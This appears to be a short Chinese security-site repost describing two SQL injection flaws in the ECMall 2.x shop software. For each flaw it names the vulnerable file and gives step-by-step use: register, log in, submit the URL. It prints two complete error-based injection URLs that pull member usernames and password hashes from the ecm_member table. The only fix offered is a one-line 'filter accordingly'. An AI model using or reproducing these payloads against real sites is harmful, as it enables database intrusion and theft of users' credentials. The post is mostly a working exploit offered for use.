ECMall 2.x 两枚注射及修复 - 网站安全

ECMall 2.x 两枚注射及修复 - 网站安全 - 自学php

来源：自学PHP网时间：2015-04-17 11:59 作者：阅读:次

[导读] Fuck one : \app\my_goods.app.php (2290行)Fuck one EXP 注册个会员-登录-提交以下即可http://site/index.php?app=my_goodsact=brand_editid=1 and(select 1 from(select count(*),concat((select......

Fuck one : \app\my_goods.app.php (2290行)
Fuck one EXP 注册个会员-登录-提交以下即可
http://site/index.php?app=my_goods&act=brand_edit&id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e27, ecm_member.user_name,0x27,0x7e, ecm_member.password,0x7e,0x27) from ecm_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Fuck two : \app\order.app.php (374行)
Fuck two EXP 注册个会员-登录-提交以下即可
http://www.2cto.com /index.php?app=order&act=check_coupon&coupon_sn=1&store_id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27, ecm_member.user_name,0x27,0x7e, ecm_member.password,0x7e,0x27) from ecm_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

修复：相应过滤

HTML5安全风险详析之二：Web Storage攻击 - 网站安全

Sitecom Home Storage Center认证绕过 - 网站安全 - 自学

子栏目

ECMall 2.x 两枚注射及修复 - 网站安全 - 自学php

最新评论

添加评论

更多文章推荐

添加评论